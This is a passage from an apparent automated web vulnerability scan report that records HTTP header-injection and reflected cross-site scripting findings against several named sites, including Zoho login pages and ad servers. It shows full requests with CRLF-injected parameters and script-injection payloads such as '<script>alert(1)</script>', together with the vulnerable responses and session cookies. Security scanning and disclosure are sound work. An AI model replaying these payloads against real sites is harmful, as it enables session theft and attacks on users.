Cookie: ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; ANRTT=53615^1^1299284361|52766^1^1299284361|60130^1^1298898484|50213^1^1298930280|50239^1^1298930837; TData=99999|^|53575|53656|54063|56768|56830|56835|60506|60515|#|53615|52766|60130|50213|50239; N=2:2d4ec7443dfa469e64430537b01b46dc,ca3680f9be00bf67dd48c45e051ee302; ATTAC=a3ZzZWc9OTk5OTk6NTM1NzU6NTM2NTY6NTQwNjM6NTY3Njg6NTY4MzA6NTY4MzU6NjA1MDY6NjA1MTU6NTM2MTU6NTI3NjY6NjAxMzA6NTAyMTM6NTAyMzk=; eadx=1; CfP=1; JEB2=4D69B03E6E651A440C6EAF39F001EBEA

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 02:33:28 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Sun, 27 Feb 2011 02:48:28 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; path=/; expires=Wed, 22-Feb-12 02:33:28 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=53615^1^1299284361|52766^1^1299284361|60130^1^1298898484|50213^1^1298930280|50239^1^1298930837|60190^1^1299378808; path=/; expires=Sun, 06-Mar-11 02:33:28 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1298774008^1298775808|8ecf0
6420ebe94a
^1298774008^1298775808; path=/; expires=Sun, 27-Feb-11 03:03:28 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|53575|53656|56768|56830|56835|60515|#|53615|52766|60130|50213|50239|60190; expires=Wed, 22-Feb-12 02:33:28 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: Anxd=x; expires=Sun, 27-Feb-11 08:33:28 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:ca3680f9be00bf67dd48c45e051ee302,c638727a4faa7467533adb5623113b72; expires=Wed, 22-Feb-12 02:33:28 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTM1NzU6NTM2NTY6NTY3Njg6NTY4MzA6NTY4MzU6NjA1MTU6NTM2MTU6NTI3NjY6NjAxMzA6NTAyMTM6NTAyMzk6NjAxOTA=; expires=Wed, 22-Feb-12 02:33:28 GMT; path=/; domain=.at.atwola.com
Cteonnt-Length: 176
Content-Type: application/x-javascript
Content-Length: 176

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16lsqii1n1a3cr';
var ANSL='99999|^|53575|53656|56768|56830|56835|60515|#|53615|52766|60130|50213|50239|60190';
ANRTXR();


2.9. http://tags.crwdcntrl.net/5/c=25/b=1225394 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tags.crwdcntrl.net
Path:   /5/c=25/b=1225394

Request

GET /5/c=25/b=1225394?f335d%0d%0a6c92f1d82cf=1 HTTP/1.1
Host: tags.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/series_metacategory/1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aud=ABR4nGNgYGDwzdxymoGBUS%2FlldVZBlkGBgEl%2FV5OoHgvmOK5DKYEv4IpXmYwJdQGkbsJEZSG8PjAFNdjMMX%2FF0wJc4ApNl4wxWEEETRjAAE%2BUTBP4DhEsBosKPQMot0NYm0ExL5iCFUCseg9WKWwPpji%2FQdxhCnEMIgGLn8gBQDbtibF; cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2FmltP%2Fv2ydx8DAqJfyyuosSIyBzVlWiYmBQfJC8X9GBoYvDAxACshnbGDgUIp3gQsBGYxKSTOhfLA8s9BWS0aYThBfKd4LWZ5RaNMOsHweRJ6RgUOmTh3dLq7WSRhC9Q3oQpyPl6MLcSfswhTaiS7EV%2FEWXUjW7CK6EAAHWlQ7; OAID=6f898f9e37a5ffbfb8f8475e2a918987

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 27 Feb 2011 02:23:34 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwzdy6jIGBUS%2Fl7URjBlkGBgElBjDoBZM8l8GU4FcwxcsMpoTaIHI3IYLSEB4fmOJ6DKZEFcAU%2F18wJcwBpth4wRSHEZjiE4WoFAZTAschRj%2BD6HODWBsBESyGUCUQi943MDQArf0HMVofzBOIgAiaQhzhDyQArR4Vqg%3D%3D; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:23:34 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2Fm1mX%2Fv2w5zMDAqJfydqIxSIyBzVlWiYmBQZKB4T8jA8OX%2F3%2BAFJARI7RpEyNMGMhQENq0A5lvo8z1F5nPpBTvgqyfUWirJUj%2B%2F18on4FDpk4d3SKu1kkYQvUN6ELcCbvQhTgfL8dUtRNdiK%2FiLbqQrNlFdCEAS1pZFg%3D%3D; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:23:34 GMT; Path=/
Location: http://f335d
6c92f1d82cf
=1
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
Content-Length: 0


2.10. http://tags.crwdcntrl.net/5/c=25/b=1225400 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tags.crwdcntrl.net
Path:   /5/c=25/b=1225400

Request

GET /5/c=25/b=1225400?2f2f5%0d%0a3a2cc9ab32b=1 HTTP/1.1
Host: tags.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/series_metacategory/1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aud=ABR4nGNgYGDwzdxymoGBUS%2FlldVZBlkGBgEl%2FV5OoHgvmOK5DKYEv4IpXmYwJdQGkbsJEZSG8PjAFNdjMMX%2FF0wJc4ApNl4wxWEEETRjAAE%2BUTBP4DhEsBosKPQMot0NYm0ExL5iCFUCseg9WKWwPpji%2FQdxhCnEMIgGLn8gBQDbtibF; cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2FmltP%2Fv2ydx8DAqJfyyuosSIyBzVlWiYmBQfJC8X9GBoYvDAxACshnbGDgUIp3gQsBGYxKSTOhfLA8s9BWS0aYThBfKd4LWZ5RaNMOsHweRJ6RgUOmTh3dLq7WSRhC9Q3oQpyPl6MLcSfswhTaiS7EV%2FEWXUjW7CK6EAAHWlQ7; OAID=6f898f9e37a5ffbfb8f8475e2a918987

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 27 Feb 2011 02:23:08 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwzdzaw8DAqJfyVjeXQZaBQUCJAQx6wSTPZTAl%2BBVM8TKDKaE2iNxNiKA0hMcHprgegylRBTDF%2FxdMCXOAKTZeMMVhBKb4RCEqhcGUwHGI0c8g%2Btwg1kZABIshVAnEovcNDA1AM%2FXBFO8%2FiCNMIaZEgAW5%2FIFsAG6pFWY%3D; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:23:08 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2Fm1p7%2FX7bcZWBg1Et5q5sLEmNgc5ZVYmJgkGRg%2BM%2FIwPDl%2Fx8gBWQoCW3awQgTBjIUhDZtAvH%2F%2F4XwGZXiXZDVMypz%2FUVWzyi01RJFPQOHTJ06ukVcrZMwhOob0IW4E3ahC3E%2BXo6paie6EF%2FFW3QhWbOL6EIAg7Jacg%3D%3D; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:23:08 GMT; Path=/
Location: http://2f2f5
3a2cc9ab32b
=1
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
Content-Length: 0


2.11. http://tags.crwdcntrl.net/5/c=25/b=1226041 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tags.crwdcntrl.net
Path:   /5/c=25/b=1226041

Request

GET /5/c=25/b=1226041?2bdae%0d%0a32111a498f8=1 HTTP/1.1
Host: tags.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/series_metacategory/1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aud=ABR4nGNgYGDwzdxymoGBUS%2FlldVZBlkGBgEl%2FV5OoHgvmOK5DKYEv4IpXmYwJdQGkbsJEZSG8PjAFNdjMMX%2FF0wJc4ApNl4wxWEEETRjAAE%2BUTBP4DhEsBosKPQMot0NYm0ExL5iCFUCseg9WKWwPpji%2FQdxhCnEMIgGLn8gBQDbtibF; cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2FmltP%2Fv2ydx8DAqJfyyuosSIyBzVlWiYmBQfJC8X9GBoYvDAxACshnbGDgUIp3gQsBGYxKSTOhfLA8s9BWS0aYThBfKd4LWZ5RaNMOsHweRJ6RgUOmTh3dLq7WSRhC9Q3oQpyPl6MLcSfswhTaiS7EV%2FEWXUjW7CK6EAAHWlQ7; OAID=6f898f9e37a5ffbfb8f8475e2a918987

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 27 Feb 2011 02:23:36 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwzdy6goGBUS%2Fl7YyHDLIMDAJKDGDQCyZ5LoMpwa9gipcZTAm1QeRuQgSlITw%2BMMX1GEyJKoAp%2Fr9gSpgDTLHxgikOIzDFJwpRKQymBI5DjH4G0ecGsTYCIlgMoUogFr1vYGgAmqkPpnj%2FQRxhCjElAizI5Q9kAwA5%2FRZh; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:23:36 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2Fm1hX%2Fv2w5yMDAqJfydsZDkBgDm7OsEhMDgyQDw39GBoYv%2F%2F8AKSCjT2irJSNMGMiQEdq0A5lvI7RpEzLfQpnrLzKfWSneBdk8RgYOmTp1dIu4WidhCNU3oAtxJ%2BxCF%2BJ8vBxT1U50Ib6Kt%2BhCsmYX0YUA271YNQ%3D%3D; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:23:36 GMT; Path=/
Location: http://2bdae
32111a498f8
=1
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
Content-Length: 0


3. Cross-site scripting (reflected)  previous  next
There are 313 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.



3.1. https://accounts.zoho.com/login [serviceurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://accounts.zoho.com
Path:   /login

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /login?service_language=en&dcc=true&hide_title=true&servicename=ZohoDiscussions&hide_signup=true&serviceurl=http%3A%2F%2Fduck.cocbc11'%3b9fabd1aa3a3 HTTP/1.1
Host: accounts.zoho.com
Connection: keep-alive
Referer: http://duck.co/portalLogin.do?serviceurl=/&forumGroupUrl=duckduckgo
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=168905406.1298947680.1.1.utmcsr=duck.co|utmccn=(referral)|utmcmd=referral|utmcct=/subscribeRegister.do; __utma=168905406.68197405.1298947680.1298947680.1298947680.1; __utmc=168905406; __utmb=168905406.1.10.1298947680; iamcsr=17d8938e-e664-4e84-8c5d-c1bc26754003; rtk=1298947649191; JSESSIONID=BC277CF3337675932ED541A636212CD9

Response

HTTP/1.1 200 OK
P3P: CP="CAO PSA OUR"
Set-Cookie: IAMAGENTTICKET=; Domain=.zoho.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 01 Mar 2011 02:58:11 GMT
Server: ZWS
Content-Length: 20982


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1.dtd">


<html>
<head>
<title>Zoho Accounts</title>
<style type="text
...[SNIP]...
xOf("http://")==0){iurl=iurl.replace("http://", "https://");window.location.href=iurl;}
}


var enableReload = true;
var serviceurl = 'http://duck.cocbc11';9fabd1aa3a3';
var servicename ='ZohoDiscussions';
var domain_label='null';
var domain_suffix='null';
var partner_domain='null';
var hidesecure = 'null';
...[SNIP]...

3.2. https://accounts.zoho.com/login [serviceurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://accounts.zoho.com
Path:   /login

Request

GET /login?service_language=en&dcc=true&hide_title=true&servicename=ZohoDiscussions&hide_signup=true&serviceurl=http%3A%2F%2Fduck.codec4c'><a%20b%3dc>57f8520d9a7 HTTP/1.1
Host: accounts.zoho.com
Connection: keep-alive
Referer: http://duck.co/portalLogin.do?serviceurl=/&forumGroupUrl=duckduckgo
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=168905406.1298947680.1.1.utmcsr=duck.co|utmccn=(referral)|utmcmd=referral|utmcct=/subscribeRegister.do; __utma=168905406.68197405.1298947680.1298947680.1298947680.1; __utmc=168905406; __utmb=168905406.1.10.1298947680; iamcsr=17d8938e-e664-4e84-8c5d-c1bc26754003; rtk=1298947649191; JSESSIONID=BC277CF3337675932ED541A636212CD9

Response

HTTP/1.1 200 OK
P3P: CP="CAO PSA OUR"
Set-Cookie: IAMAGENTTICKET=; Domain=.zoho.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 01 Mar 2011 02:58:06 GMT
Server: ZWS
Content-Length: 21044


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1.dtd">


<html>
<head>
<title>Zoho Accounts</title>
<style type="text
...[SNIP]...
<input name="serviceurl" value='http://duck.codec4c'><a b=c>57f8520d9a7' type="hidden">
...[SNIP]...

3.3. https://accounts.zoho.com/register [serviceurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://accounts.zoho.com
Path:   /register

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register?serviceurl=http%3A%2F%2Fwww.zoho.com%2Fd5eb9'%3b1be191a250d HTTP/1.1
Host: accounts.zoho.com
Connection: keep-alive
Referer: http://www.zoho.com/company.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=168905406.1298947680.1.1.utmcsr=duck.co|utmccn=(referral)|utmcmd=referral|utmcct=/subscribeRegister.do; __utma=168905406.68197405.1298947680.1298947680.1298947680.1; __utmc=168905406; __utmb=168905406.1.10.1298947680

Response

HTTP/1.1 200 OK
Set-Cookie: iamcsr=e664ef78-f1ac-43cb-a39a-487d1de27edd; Path=/
P3P: CP="CAO PSA OUR"
Set-Cookie: rtk=1298948242860; Domain=.zoho.com; Path=/
Set-Cookie: JSESSIONID=47F52FEAAF426CCC55DE7DA90AD3BBD3; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 01 Mar 2011 02:57:22 GMT
Server: ZWS
Content-Length: 33949


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1.dtd">


<html>
<head>
   <title>Create New Account</title>
<script type="text
...[SNIP]...
A-Za-z0-9]/;
var endWithPat = /[A-Za-z0-9]$/;
var contDots = /([._][._])+/;
var validChars = /^[A-Za-z0-9_\.]+$/;
var onlyNumbers = /^[0-9]+$/
var serviceurl = 'http://www.zoho.com/d5eb9';1be191a250d';
var servicename ='AaaServer';
var partner_domain = 'null';
var blockedEmailDomain = '@zoho.com';
var csrfParam = 'iamcsrcoo=e664ef78-f1ac-43cb-a39a-487d1de27edd';

function de(id) {

...[SNIP]...

3.4. https://accounts.zoho.com/register [serviceurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://accounts.zoho.com
Path:   /register

Request

GET /register?serviceurl=http%3A%2F%2Fwww.zoho.com%2Fe5e26"><a%20b%3dc>81b0dd0d3be HTTP/1.1
Host: accounts.zoho.com
Connection: keep-alive
Referer: http://www.zoho.com/company.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=168905406.1298947680.1.1.utmcsr=duck.co|utmccn=(referral)|utmcmd=referral|utmcct=/subscribeRegister.do; __utma=168905406.68197405.1298947680.1298947680.1298947680.1; __utmc=168905406; __utmb=168905406.1.10.1298947680

Response

HTTP/1.1 200 OK
Set-Cookie: iamcsr=6036367f-1895-4835-8529-daacea5ef066; Path=/
P3P: CP="CAO PSA OUR"
Set-Cookie: rtk=1298948230872; Domain=.zoho.com; Path=/
Set-Cookie: JSESSIONID=E12CEA8FE7E699AF8388FFDD871E4559; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 01 Mar 2011 02:57:10 GMT
Server: ZWS
Content-Length: 33998


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1.dtd">


<html>
<head>
   <title>Create New Account</title>
<script type="text
...[SNIP]...
<span onclick="window.parent.location.href='http://www.zoho.com/e5e26"><a b=c>81b0dd0d3be';">
...[SNIP]...

3.5. https://accounts.zoho.com/register [serviceurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://accounts.zoho.com
Path:   /register

Request

GET /register?serviceurl=http%3A%2F%2Fwww.zoho.com%2Fa6505'><a%20b%3dc>3e0edf48d9e HTTP/1.1
Host: accounts.zoho.com
Connection: keep-alive
Referer: http://www.zoho.com/company.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=168905406.1298947680.1.1.utmcsr=duck.co|utmccn=(referral)|utmcmd=referral|utmcct=/subscribeRegister.do; __utma=168905406.68197405.1298947680.1298947680.1298947680.1; __utmc=168905406; __utmb=168905406.1.10.1298947680

Response

HTTP/1.1 200 OK
Set-Cookie: iamcsr=65722aa7-5f18-437c-bf15-1297f4069921; Path=/
P3P: CP="CAO PSA OUR"
Set-Cookie: rtk=1298948238307; Domain=.zoho.com; Path=/
Set-Cookie: JSESSIONID=D7A70DBB831B5F632AFFDE7C92B233B1; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 01 Mar 2011 02:57:17 GMT
Server: ZWS
Content-Length: 33998


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1.dtd">


<html>
<head>
   <title>Create New Account</title>
<script type="text
...[SNIP]...
<input name="serviceurl" value='http://www.zoho.com/a6505'><a b=c>3e0edf48d9e' type="hidden">
...[SNIP]...

3.6. http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1430720&pid=11287695f6c7<script>alert(1)</script>9faa69a0bfd&ps=-1&zw=475&zh=200&url=http%3A//forums.winamp.com/&v=5&dct=Winamp%20Forums&metakw=media%20player,mp3%20player,music%20player,ipod%20sync,multimedia%20player,player,winamp HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://forums.winamp.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 17:43:39 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2510


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>
                   
                   
                                           java.lang.NumberFormatException: For input string: "11287695f6c7<script>alert(1)</script>9faa69a0bfd"

   
                                                           </head>
...[SNIP]...

3.7. http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1430720ce49b--><script>alert(1)</script>7267909dc51&pid=1128769&ps=-1&zw=475&zh=200&url=http%3A//forums.winamp.com/&v=5&dct=Winamp%20Forums&metakw=media%20player,mp3%20player,music%20player,ipod%20sync,multimedia%20player,player,winamp HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://forums.winamp.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 17:43:16 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3257


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "1430720ce49b--><script>alert(1)</script>7267909dc51" -->
...[SNIP]...

3.8. http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1430720&pid=1128769&ps=-178c7f--><script>alert(1)</script>c5a78cccd8b&zw=475&zh=200&url=http%3A//forums.winamp.com/&v=5&dct=Winamp%20Forums&metakw=media%20player,mp3%20player,music%20player,ipod%20sync,multimedia%20player,player,winamp HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://forums.winamp.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 17:44:02 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3696


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "-178c7f--><script>alert(1)</script>c5a78cccd8b" -->
   
...[SNIP]...

3.9. http://alterianwaserver.alterianconnect.net/tracking.aspx/gettoken/ [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://alterianwaserver.alterianconnect.net
Path:   /tracking.aspx/gettoken/

Request

